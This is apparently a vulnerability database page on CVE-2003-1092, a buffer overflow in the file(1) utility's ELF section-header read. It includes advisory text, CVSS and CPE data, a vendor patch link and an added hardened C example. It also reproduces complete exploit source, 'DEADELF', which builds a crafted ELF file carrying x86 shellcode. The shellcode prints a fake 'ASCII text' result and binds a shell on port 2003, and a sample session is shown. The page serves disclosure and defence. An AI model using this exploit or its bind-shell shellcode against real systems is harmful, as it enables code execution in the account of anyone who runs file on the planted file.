CVE-2003-1092
CVSS7.5
Published: 2003-12-31 00:00:00
Revised: 2008-09-05 16:36:01
NMCOE    

[Original] Unknown vulnerability in the "Automatic File Content Type Recognition (AFCTR) Tool version of the file package before 3.41, related to "a memory allocation problem," has unknown impact.


[CNNVD] file utility local buffer overflow vulnerability (CNNVD-200312-187)

        file(1) is a tool that identifies the type of a file.
        The file(1) command contains a buffer overflow vulnerability; a local attacker can exploit it to execute arbitrary instructions on the system with the privileges of the user running file(1).
        The problem lies in the doshn() call inside tryelf() at line 587 of readelf.c:
        doshn(class, swap,
        fd,
        getu32(swap, elfhdr.e_shoff),
        getu16(swap, elfhdr.e_shnum),
        getu16(swap, elfhdr.e_shentsize));
        The last argument to doshn(), 'elfhdr.e_shentsize', is later used as the length of the read() call at line 133 of readelf.c:
        if (read(fd, sh_addr, size) == -1)
        The read() call copies 'size' bytes into the 'sh_addr' variable defined at line 92 of readelf.c:
        #define sh_addr (class == ELFCLASS32 \
         ? (void *) &sh32 \
         : (void *) &sh64)
        The buffer used by read() is only 0x20 (32) bytes; supplying a 'size' argument of 0x28 (40) bytes overwrites the saved EBP and EIP on the stack, allowing arbitrary code to run with another user's privileges.
        A user can craft a malicious file and induce another user to analyze it; the resulting buffer overflow executes arbitrary instructions with the privileges of the user running file(1).
        
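The following is an added example, not code from file(1), from the vendor, or from this advisory. It shows the defensive shape of the section-header read described above: the copy length is the size of the destination struct, never the attacker-controlled e_shentsize, and the entry is bounds-checked against the image before anything is copied. It uses the system elf.h definitions (Elf32_Shdr is 40 bytes there, unlike the 0x20-byte buffer the advisory describes for file 3.39), and the function names, the section_header type, the status codes and the constructed test image are all assumptions of this example rather than anything in file's own readelf.c.

```c
#include <elf.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Outcome of copying one section header out of an in-memory ELF image. */
enum shdr_status {
    SHDR_OK = 0,
    SHDR_BAD_IDENT,     /* not ELF, unknown class, or non-native byte order */
    SHDR_BAD_ENTSIZE,   /* e_shentsize smaller than the header struct */
    SHDR_TRUNCATED      /* requested entry lies outside the image */
};

/* Destination sized by the struct, never by the file (hypothetical type). */
typedef struct {
    unsigned char cls;  /* ELFCLASS32 or ELFCLASS64 */
    union { Elf32_Shdr sh32; Elf64_Shdr sh64; } u;
} section_header;

/* Byte order of the host, expressed as an EI_DATA value. */
static unsigned char host_elf_data(void)
{
    uint16_t probe = 1;
    unsigned char first;
    memcpy(&first, &probe, 1);
    return first == 1 ? ELFDATA2LSB : ELFDATA2MSB;
}

/* Hardened counterpart of doshn()+read(): validates e_shentsize, bounds-checks
 * the entry, then copies exactly sizeof(struct) bytes. Native byte order only. */
enum shdr_status read_section_header(const unsigned char *img, size_t img_len,
                                     unsigned idx, section_header *out)
{
    if (img_len < EI_NIDENT || memcmp(img, ELFMAG, SELFMAG) != 0)
        return SHDR_BAD_IDENT;
    if (img[EI_DATA] != host_elf_data())
        return SHDR_BAD_IDENT;

    uint64_t shoff;
    uint32_t shentsize, shnum;
    size_t want;            /* bytes the destination struct actually holds */
    if (img[EI_CLASS] == ELFCLASS32) {
        Elf32_Ehdr eh;
        if (img_len < sizeof eh) return SHDR_TRUNCATED;
        memcpy(&eh, img, sizeof eh);
        shoff = eh.e_shoff; shentsize = eh.e_shentsize; shnum = eh.e_shnum;
        want = sizeof(Elf32_Shdr);
    } else if (img[EI_CLASS] == ELFCLASS64) {
        Elf64_Ehdr eh;
        if (img_len < sizeof eh) return SHDR_TRUNCATED;
        memcpy(&eh, img, sizeof eh);
        shoff = eh.e_shoff; shentsize = eh.e_shentsize; shnum = eh.e_shnum;
        want = sizeof(Elf64_Shdr);
    } else {
        return SHDR_BAD_IDENT;
    }

    /* A too-small entry would leave the struct partially filled; a too-large
     * one is harmless because the copy below is capped at `want`. */
    if (shentsize < want) return SHDR_BAD_ENTSIZE;
    if (idx >= shnum) return SHDR_TRUNCATED;
    uint64_t start = shoff + (uint64_t)idx * shentsize;
    if (start < shoff || start > img_len || img_len - start < shentsize)
        return SHDR_TRUNCATED;

    out->cls = img[EI_CLASS];
    memcpy(&out->u, img + start, want);
    return SHDR_OK;
}

/* Constructed test image (not a real binary): ELF32 header followed by one
 * section-header table entry of `entsize` bytes with sh_name = name.
 * Returns the image length, or 0 if the buffer is too small. */
size_t build_elf32_image(unsigned char *buf, size_t cap,
                         uint16_t entsize, uint32_t name)
{
    Elf32_Ehdr eh; Elf32_Shdr sh;
    size_t total = sizeof eh + entsize;
    if (entsize == 0 || cap < total) return 0;
    memset(&eh, 0, sizeof eh); memset(&sh, 0, sizeof sh);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS32;
    eh.e_ident[EI_DATA] = host_elf_data();
    eh.e_ident[EI_VERSION] = EV_CURRENT;
    eh.e_type = ET_REL; eh.e_machine = EM_386; eh.e_version = EV_CURRENT;
    eh.e_ehsize = sizeof eh; eh.e_shoff = sizeof eh;
    eh.e_shentsize = entsize; eh.e_shnum = 1;
    sh.sh_name = name;
    memset(buf, 0xAA, total);                 /* filler past the struct */
    memcpy(buf, &eh, sizeof eh);
    memcpy(buf + sizeof eh, &sh, (size_t)entsize < sizeof sh ? entsize : sizeof sh);
    return total;
}

/* An e_shentsize of 0xfff (the value the exploit further down this page writes)
 * passes validation, yet the copy stops at sizeof(Elf32_Shdr): returns 1 when
 * the header was read and the canary after the destination is untouched. */
int oversize_entry_is_contained(void)
{
    unsigned char img[8192];
    struct { section_header sh; unsigned char canary[16]; } guard;
    size_t n = build_elf32_image(img, sizeof img, 0xfff, 9);
    memset(&guard, 0x5A, sizeof guard);
    if (n == 0 || read_section_header(img, n, 0, &guard.sh) != SHDR_OK) return 0;
    if (guard.sh.u.sh32.sh_name != 9) return 0;
    for (int i = 0; i < 16; i++) if (guard.canary[i] != 0x5A) return 0;
    return 1;
}

int main(void)
{
    printf("oversize e_shentsize contained: %s\n",
           oversize_entry_is_contained() ? "yes" : "no");
    return 0;
}
```

The design choice is that e_shentsize is treated as a table stride and a minimum, not as a copy length: anything smaller than the struct is rejected, anything larger only affects where the next entry starts, and the destination is never written beyond its own size.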

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance degradation or interrupted access to resources is possible]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:christos_zoulas:file_1:3.28
cpe:/a:christos_zoulas:file_1:3.39
cpe:/a:christos_zoulas:file_1:3.36
cpe:/a:christos_zoulas:file_1:3.30
cpe:/a:christos_zoulas:file_1:3.40
cpe:/a:christos_zoulas:file_1:3.35
cpe:/a:christos_zoulas:file_1:3.34
cpe:/a:christos_zoulas:file_1:3.32
cpe:/a:christos_zoulas:file_1:3.33
cpe:/a:christos_zoulas:file_1:3.37

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1092
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1092
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-187
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/100937
(VENDOR_ADVISORY)  CERT-VN  VU#100937
http://xforce.iss.net/xforce/xfdb/11488
(UNKNOWN)  XF  file-afctr-memory-allocation(11488)
http://www.securityfocus.com/bid/7009
(UNKNOWN)  BID  7009
http://www.securityfocus.com/archive/1/313847
(UNKNOWN)  OPENPKG  OpenPKG-SA-2003.017

- Vulnerability information

file utility local buffer overflow vulnerability
High severity  Design error
2003-12-31 00:00:00 2005-10-20 00:00:00
Local

- Advisories and patches

        Vendor patch:
        Christos Zoulas
        ---------------
        The vendor has released an upgrade that fixes this security issue; download it from the vendor's site:
        ftp://ftp.astron.com/pub/file/file-3.41.tar.gz

- Vulnerability information (22326)

File 3.x Utility Local Memory Allocation Vulnerability (EDBID:22326)
linux local
2003-03-06 Verified
0 CrZ
N/A
source: http://www.securityfocus.com/bid/7009/info

It has been reported that a memory allocation issue exists in the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to cause a denial of service condition, and potentially execute code as the user of the file utility.

/*
\   __________________
/   Black Sand Project
\   __________________
/
\   Created by CrZ [crazy_einstein@yahoo.com] LimpidByte [lbyte.void.ru] /06.03.2003/
/
\   Bug discovered by iDEFENCE: http://www.idefense.com/advisory/03.04.03.txt
/   
\   program name: DEADELF
/
\   description: Exploit for file program <= 3.39
/
\   info: program create file-exploit and when you 
/   make "file /path/to/this/file-exploit" shell
\   will open on 2003 port.
/
\   Usage: ./85deadelf <file-exploit> [return address]
/
\   Example of work:
/
\	[crz@blacksand crz]$ gcc -o 85deadelf 85deadelf.c
/	[crz@blacksand crz]$ ./85deadelf deadelf
\	[+] Creating a evil file deadelf!
/	[+] Using address of shellcode = 0xbfffbd40
\	[crz@blacksand crz]$ file deadelf
/	File: ASCII text
\	[crz@blacksand crz]$ telnet localhost 2003
/	Trying 127.0.0.1...
\	Connected to blacksand (127.0.0.1).
/	Escape character is '^]'.
\	id;
/	uid=500(crz) gid=500(crz) groups=500(crz)
\	: command not found
/	exit;
\	Connection closed by foreign host.
/	[crz@blacksand crz]$
\
/   Tested against: file-3.37 (RedHat8.0)
\		    file-3.38 (RedHat8.0)
*/


#include <fcntl.h>
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>   /* exit(), system() */
#include <strings.h>  /* bzero() */
#include <unistd.h>   /* write(), close() */


void usage(char *prog) {

	printf("\nCreated by CrZ [crazy_einstein@yahoo.com] Limpid Byte [lbyte.void.ru]\n");
	printf("Usage: %s <name of evil file> [return address]\n\n",prog);
	exit(0);
}

int main(int argc, char **argv) {
	
/* 
\   a simple shellcode that show fake result of file program & bind
/   shell on 2003 port by CrZ
*/
	
char shellcode[]=
	"\x31\xc0\x31\xdb\x53\xb3\x01\x50" /* write(1,"File: ASCII text");*/
	"\x68\x01\x01\x0a\x0d\x68\x74\x65"
	"\x78\x74\x68\x43\x49\x49\x20\x68"
	"\x3a\x20\x41\x53\x68\x46\x69\x6c"
	"\x65\x89\xe1\xb2\x18\xb0\x04\xcd\x80"
        /* bind shell on 2003 port */
        "\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
        "\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
        "\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
        "\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
        "\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
        "\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
        "\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
        "\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
	
	int fd,i;
	Elf32_Ehdr elfhdr;
	long xret=0xbfffbd40;
	char *evilfile="bl00mps";
	char tmp[100];
	
	if(!argv[1]) usage(argv[0]);
	else evilfile=argv[1];
	if(argv[2]) sscanf(argv[2],"0x%lx",&xret); /* xret is a long */
	
	printf("[+] Creating a evil file %s!\n",evilfile);
	printf("[+] Using address of shellcode = 0x%lx\n",xret);	
	
	sprintf(tmp,"echo>%s",evilfile);
	system(tmp);
	fd=open(evilfile,O_WRONLY);

	bzero(&elfhdr,sizeof elfhdr );
	elfhdr.e_type=1; //type should by NOT ET_CORE (4) & NOT ET_EXEC (2)
	sprintf(elfhdr.e_ident,"\x7f\x45\x4c\x46\x01\x01\x01"); //ELF32 FORMAT
	elfhdr.e_machine=1;
	elfhdr.e_version=1;
	elfhdr.e_entry=0;
	elfhdr.e_phoff=0;
	elfhdr.e_shoff=0;
	elfhdr.e_flags=0;
	elfhdr.e_ehsize=0;
	elfhdr.e_phentsize=0xfff; //define size for read()
	elfhdr.e_phnum=1; //this is for stop for() loop when read()
	elfhdr.e_shentsize=0xfff; //define size for read()
	elfhdr.e_shnum=1; //this is for stop for() loop when read()
	elfhdr.e_shstrndx=0;
	write(fd,&elfhdr,sizeof(elfhdr));
	
	for(i=0;i<20;i++) write(fd,&xret,4); //write new return address
	for(i=0;i<6000;i++) write(fd,"\x90",1); //write nops
	write(fd,&shellcode,sizeof shellcode); //write shellcode

	close(fd);

	
	return 0;	
}

		

- Vulnerability information

14743
AFCTR file Improper Memory Allocation

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-03-04 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete